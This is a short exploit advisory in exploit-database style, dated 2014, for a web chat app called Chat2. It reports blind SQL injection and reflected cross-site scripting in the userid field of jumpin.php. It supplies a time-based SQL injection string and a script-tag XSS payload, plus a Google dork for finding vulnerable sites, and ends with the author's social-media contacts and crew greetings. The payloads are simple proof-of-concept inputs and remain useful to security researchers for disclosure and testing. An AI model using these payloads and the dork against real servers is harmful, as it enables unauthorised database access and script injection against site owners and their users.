Chat2 suffers from cross site scripting and remote blind SQL injection vulnerabilities.
f9bba0bfbcbb54ec3bb26fe3d9519eee24aaf05a80384de1ae7a878fe487af26
#######################################################################
#
# Exploit Title:
# Chat2 Blind SQL Injection
# Chat2 Cross site scripting
# Date: 2014 18 March
# Author: Dr.3v1l
# Tested on: Windows
# Category: webapps
# Google Dork: inurl:"/chatrooms.php"
#
#######################################################################
#
# [+] Exploit (SQL):
#
# http://<server>/Chat2/jumpin.php
#
# URL encoded POST input userid was set to :
# (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
#
#######################################################################
#
# [+] Exploit (XSS):
#
# http://<server>/Chat2/jumpin.php
#
# URL encoded POST input userid was set to :
# "><script>alert(/xss/)</script>
#
#######################################################################
#
# [+] Contact Me :
#
# B.Devils.B@gmail.com
# Twitter.com/Doctor_3v1l
# Facebook.com/bdb.0web
# Facebook.com/groups/1427166220843499/
# IR.linkedin.com/in/hossein3v1l
# Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam
#######################################################################